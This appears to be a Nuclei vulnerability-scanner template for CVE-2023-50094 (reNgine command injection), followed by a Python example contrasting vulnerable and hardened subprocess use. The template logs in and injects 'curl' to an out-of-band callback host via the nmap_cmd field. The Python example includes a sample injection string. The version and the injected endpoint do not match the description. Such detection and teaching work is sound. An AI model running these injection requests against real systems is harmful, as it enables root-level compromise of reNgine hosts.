id: CVE-2023-50094

info:
  name: reNgine 2.2.0 - Command Injection
  author: Zierax
  severity: high
  description: |
    reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.
  impact: |
    Authenticated attackers can inject arbitrary OS commands that execute as root, leading to complete system compromise and data exfiltration.
  remediation: |
    Upgrade reNgine to version 2.1.2 or later, which includes proper input validation.
  reference:
    - https://github.com/yogeshojha/rengine
    - https://github.com/Zierax/CVE-2023-50094_POC
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50094
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-50094
    cwe-id: CWE-78
    epss-score: 0.88564
    epss-percentile: 0.99521
    cpe: cpe:2.3:a:yogeshojha:rengine:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: yogeshojha
    product: rengine
    shodan-query: title:"reNgine"
  tags: cve,cve2023,rengine,rce,injection,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "rengine")'
        internal: true

  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

      - |
        POST /scan-engine/update HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"nmap_cmd": 'curl {{interactsh-url}}'}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol_2, "dns")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a00473045022100a171ff3951accc4dafd86741a6fba53343ef9a132d57d83484813e2ab3be359a02203de779ebd1e6b5647379c0783e7c1b02882bbf2924736e696ef286a309a87cb4:922c64590222798bb761d5b6d8e72950
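The description above names the root cause: a user-supplied URL is interpolated into a shell command line and run through subprocess.check_output. The following Python is an added illustration of that CWE-78 pattern beside a hardened form; it is not reNgine's code. Names such as build_vulnerable_cmd, run_vulnerable, validate_target_url and run_hardened are invented for the example, and `echo` stands in for the real external tool so the script runs offline and the injected command is visible in the output.

```python
"""Illustrative CWE-78 pattern (vulnerable vs. hardened). Added example, not
reNgine's source. `echo` is a stand-in for the real WAF-detection tool."""
import re
import subprocess
from urllib.parse import urlparse

TOOL = "echo"  # assumption: stand-in for the external tool the real code invokes


def build_vulnerable_cmd(url: str) -> str:
    """Vulnerable pattern: untrusted input pasted into a single shell string."""
    return f"{TOOL} {url}"


def run_vulnerable(url: str) -> str:
    # shell=True hands the whole string to /bin/sh, so `;`, `|`, `$(...)` and
    # backticks inside `url` are parsed as shell syntax, not as URL text.
    return subprocess.check_output(build_vulnerable_cmd(url), shell=True, text=True)


def run_argv_only(url: str) -> str:
    """List argv, no validation: the string reaches the tool as one literal
    argument, so shell injection is gone, but the attacker still controls the
    argument the tool receives (argument injection). Validation is still needed."""
    return subprocess.run([TOOL, url], capture_output=True, text=True, check=True).stdout


_HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:\d{1,5})?$")
_PATH_RE = re.compile(r"[A-Za-z0-9/_.~%-]*")


def validate_target_url(url: str) -> str:
    """Allow-list check: http(s) scheme, plain host[:port] without userinfo,
    a path limited to unreserved characters, no query or fragment."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError("scheme must be http or https")
    # urlparse keeps everything up to the first '/', '?' or '#' in netloc, so a
    # payload like 'example.com;id' lands here and fails the host pattern.
    if not parsed.netloc or not _HOST_RE.match(parsed.netloc):
        raise ValueError("malformed host")
    if not _PATH_RE.fullmatch(parsed.path):
        raise ValueError("disallowed characters in path")
    if parsed.params or parsed.query or parsed.fragment:
        raise ValueError("params, query and fragment are not allowed")
    return url


def is_safe_target(url: str) -> bool:
    try:
        validate_target_url(url)
        return True
    except ValueError:
        return False


def run_hardened(url: str) -> str:
    """Validate first, then pass argv as a list so no shell is ever involved."""
    return subprocess.run(
        [TOOL, validate_target_url(url)], capture_output=True, text=True, check=True
    ).stdout


if __name__ == "__main__":
    payload = "http://example.com;echo INJECTED"  # constructed sample input
    print("vulnerable:", run_vulnerable(payload).splitlines())
    print("argv only :", run_argv_only(payload).splitlines())
    print("hardened  :", is_safe_target(payload), is_safe_target("http://example.com"))
```

The split between run_argv_only and run_hardened is deliberate: dropping shell=True removes the command injection the advisory describes, while the allow-list keeps an attacker from steering the tool with crafted arguments, which is the part a "proper input validation" fix has to cover as well.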